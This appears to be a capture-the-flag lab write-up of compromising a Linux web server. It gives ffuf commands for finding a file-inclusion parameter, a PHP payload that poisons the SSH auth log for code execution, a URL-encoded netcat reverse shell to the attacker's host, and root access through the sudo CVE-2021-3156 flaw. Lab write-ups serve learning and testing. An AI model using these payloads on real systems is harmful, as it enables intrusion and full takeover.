Target IP: 192.168.170.80
Only two TCP ports are open for this machine: SSH and HTTP. I will start my enumeration with the HTTP application.
Port 80: HTTP
We are presented the webpage above. Observing the source-code did not result in anything useful. I also searched the page for anything useful like any parameters but I had no luck.
The nikto scan above mentions there is a directory called /console and /images.
The directory search also mentions only the two directories from the nikto scan.
The /console/ sounds interesting. It contains a file called file.php. I will try to fuzz the parameter to see if we get anything useful. And using ffuf with the command ffuf -u http://192.168.170.80/console/file.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -fs 0, it worked! There is a parameter called file which can be used for LFI and directory traversal attacks.
Using the command ffuf -u http://192.168.170.80/console/file.php?file=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -fs 0, I managed to find the LFI file payloads that I can access!
I searched for any log file that could allow me to poison it for RCE. To do this, I used the following command ffuf -u http://192.168.170.80/console/file.php?file=../../../../../../../../../../../../../FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt:FUZZ -fs 0 | grep ".log". And then I was able to find a log file called /var/log.auth.log which logs every successful or failed attempt when trying to connect with the web server.
I will try to poison the /var/log/auth.log file from above to gain RCE now.
Using the payload ssh '<?php echo system($_GET['cmd']);?>'@192.168.170.80, this should poison the log file above.
And it worked. I am able to see the output from the commands ls;id;whoami when I browse to http://192.168.170.80/console/file.php?file=/var/log/auth.log&cmd=ls;id;whoami. It is time to gain a reverse shell connection now.
I started a listener on port 80 and sent the full URL with URL-encoded payload as shown below. And I got a reverse shell connection back to my host.
URL-encoded payload: rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.211%2080%20%3E%2Ftmp%2Ff
Full URL with URL-encoded payload: http://192.168.170.80/console/file.php?file=/var/log/auth.log&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.211%2080%20%3E%2Ftmp%2Ff
It is time to elevate the privileges!
Looks like there is misconfigured configurations for systemctl.
Hmmm... maybe we can exploit this instead. The sudo version is 1.8.21p2 which is vulnerable, and it has CVE-2021-3156. I used this exploit.
And this was successful! Now I am root.
The local.txt flag file once I gained a foothold on the machine.
The proof.txt flag once I exploited the vulnerable sudo binary.